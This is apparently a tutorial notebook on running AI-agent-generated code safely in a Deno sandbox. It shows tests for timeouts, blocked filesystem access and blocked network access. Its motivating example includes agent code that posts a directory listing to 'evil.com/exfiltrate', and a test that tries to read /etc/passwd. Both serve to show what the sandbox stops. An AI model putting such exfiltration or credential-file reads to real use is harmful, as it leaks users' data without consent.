# 04 - Sandbox Security: Safe Code Execution

AI agents can write code. But should we run it?

The answer is **yes, with strict isolation**. The Deno sandbox provides:

- Resource limits (CPU, memory, time)
- Permission controls (no filesystem, no network by default)
- Clean isolation (each execution is independent)

## Learning Objectives

After this notebook, you will:

- [ ] Execute code safely in an isolated sandbox
- [ ] Understand and configure resource limits
- [ ] See how the sandbox blocks dangerous operations

---

## Why a Sandbox?

Consider this scenario:

```
User: "Analyze my project and summarize the issues"

Agent generates code:
  const files = await Deno.readDir("/");
  await fetch("https://evil.com/exfiltrate", { body: JSON.stringify(files) });
```

Without a sandbox, this code could:

- Read sensitive files (`/etc/passwd`, SSH keys, `.env`)
- Send data to external servers
- Run forever and consume all CPU
- Allocate gigabytes of memory

**The sandbox prevents all of this.**

## Creating a Sandbox

Let's create a sandbox and run some code:

In [ ]:
// Import the sandbox executor
const { DenoSandboxExecutor } = await import("../../src/sandbox/executor.ts");

// Create a sandbox with default limits
const sandbox = new DenoSandboxExecutor({
  timeout: 5000, // 5 seconds max
  memoryLimit: 128, // 128 MB max
});

console.log("Sandbox created with:");
console.log("  • Timeout: 5 seconds");
console.log("  • Memory: 128 MB");
console.log("  • Network: disabled");
console.log("  • Filesystem: disabled");

In [ ]:
// Execute simple code
const code = `
  const numbers = [1, 2, 3, 4, 5];
  const sum = numbers.reduce((a, b) => a + b, 0);
  const avg = sum / numbers.length;
  return { sum, avg, count: numbers.length };
`;

const result = await sandbox.execute(code);
console.log("Result:", JSON.stringify(result, null, 2));

## Security Test 1: Timeout Protection

What happens with an infinite loop?

In [ ]:
// Try to run forever
const infiniteCode = `
  while (true) {
    // This would run forever without timeout protection
  }
  return "never reached";
`;

console.log("Executing infinite loop (should timeout)...\n");
const start = Date.now();

const result = await sandbox.execute(infiniteCode);

const elapsed = Date.now() - start;
console.log(`Execution stopped after ${elapsed}ms`);
console.log("Result:", JSON.stringify(result, null, 2));

if (!result.success) {
  console.log("\n✅ Timeout protection worked!");
}

## Security Test 2: Filesystem Blocked

Can the code read sensitive files?

In [ ]:
// Try to read /etc/passwd
const fileAccessCode = `
  const content = await Deno.readTextFile("/etc/passwd");
  return { leaked: content.slice(0, 100) };
`;

console.log("Attempting to read /etc/passwd...\n");

const result = await sandbox.execute(fileAccessCode);
console.log("Result:", JSON.stringify(result, null, 2));

if (!result.success) {
  console.log("\n✅ Filesystem access blocked!");
}

## Security Test 3: Network Blocked

Can the code exfiltrate data?

In [ ]:
// Try to make an HTTP request
const networkCode = `
  const response = await fetch("https://httpbin.org/get");
  const data = await response.json();
  return { data };
`;

console.log("Attempting to fetch external URL...\n");

const result = await sandbox.execute(networkCode);
console.log("Result:", JSON.stringify(result, null, 2));

if (!result.success) {
  console.log("\n✅ Network access blocked!");
}

## Error Handling

The sandbox captures all errors gracefully:

In [ ]:
// Syntax error
const syntaxErrorCode = `
  const x = {
    // Missing closing brace
  return x;
`;

console.log("Testing syntax error handling:\n");
const result1 = await sandbox.execute(syntaxErrorCode);
console.log("Syntax error result:", JSON.stringify(result1, null, 2));

// Runtime error
const runtimeErrorCode = `
  const obj = null;
  return obj.property; // TypeError: Cannot read property of null
`;

console.log("\nTesting runtime error handling:\n");
const result2 = await sandbox.execute(runtimeErrorCode);
console.log("Runtime error result:", JSON.stringify(result2, null, 2));

## The Security Model

| Threat               | Protection                         |
| -------------------- | ---------------------------------- |
| Infinite loops       | Timeout enforcement (default: 30s) |
| Memory exhaustion    | Memory limit (default: 512MB)      |
| File system access   | All FS permissions denied          |
| Network exfiltration | All network permissions denied     |
| Environment leakage  | No access to env variables         |
| Process spawning     | Subprocess creation blocked        |

### Safe-to-Fail Pattern

Because sandbox code is **isolated**, it can be used as "safe-to-fail" branches in DAG execution:

```
┌─── sandbox_analysis_1 ──┐     (can fail without side effects)
│                         │
├─── sandbox_analysis_2 ──┼──── combine_results
│                         │
└─── sandbox_analysis_3 ──┘     (try multiple approaches)
```

If one fails, the others continue. No state is corrupted.

---

## Quick Check

Before moving on:

1. **Why use a sandbox instead of running code directly?**
   - To prevent malicious/buggy code from accessing files, network, or consuming resources

2. **What happens if code exceeds the timeout?**
   - Execution is terminated and an error is returned

3. **What is the "safe-to-fail" pattern?**
   - Using isolated sandbox tasks that can fail without affecting other workflow branches

---

**Next:** [05-context-injection.ipynb](./05-context-injection.ipynb) - Pass data into the sandbox